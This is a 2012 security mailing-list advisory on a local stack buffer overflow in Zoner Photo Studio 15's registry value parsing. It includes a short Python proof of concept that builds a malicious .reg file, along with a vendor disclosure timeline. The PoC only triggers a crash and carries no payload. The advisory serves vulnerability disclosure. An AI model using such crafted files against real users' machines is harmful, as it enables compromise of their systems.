[<prev] [next>] [day] [month] [year] [list]
Message-ID: <509C3BAB.9020305@inshell.net>
Date: Fri, 09 Nov 2012 00:09:31 +0100
From: Inshell Security <info@...hell.net>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
vuln@...unia.com, submissions@...ketstormsecurity.org,
moderators@...db.org
Subject: [IA42] Zoner Photo Studio v15 Build 3 (Zps.exe)
Registry Value Parsing Local Buffer Overflow
Inshell Security Advisory
http://www.inshell.net
1. ADVISORY INFORMATION
-----------------------
Product: Zoner Photo Studio
Vendor URL: www.zoner.com
Type: Stack-based Buffer Overflow [CWE-121]
Date found: 2012-10-17
Date published: 2012-11-09
CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.
3. VERSIONS AFFECTED
--------------------
Zoner Photo Studio 15 Build 3
Zoner Photo Studio 15 Build 2, older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in Zoner
Photo Studio 15 Build 2 and 3.
When launching, the application loads the "Issuer" value from the
registry key "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]", but it does not validate the length of the
string loaded from the key before passing it to a buffer, which leads to
a stack-based buffer overflow.
An attacker needs to force the victim to import an arbitrary .reg file
to exploit this vulnerability.
5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python
file="poc.reg"
junk1="\x41" * 2140
boom="\x42\x42\x42\x42"
junk2="\x43" * 1000
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]\n"
poc=poc + "\"Issuer\"=\"" + junk1 + boom + junk2 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
For technical details, screenshots and/or PoCs visit:
http://security.inshell.net/advisory/42
6. SOLUTION
-----------
None
7. REPORT TIMELINE
------------------
2012-10-17: Initial notification sent to vendor about bug in Build 2
2012-10-18: Vendor Feedback / Response
2012-10-22: Short vendor statement about expected delay
2012-10-29: Notification about the disclosure date
2012-**-**: Vendor releases Build 3 which is still vulnerable
2012-11-09: No response
2012-11-09: Full Disclosure according to disclosure policy
8. REFERENCES
-------------
http://security.inshell.net
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists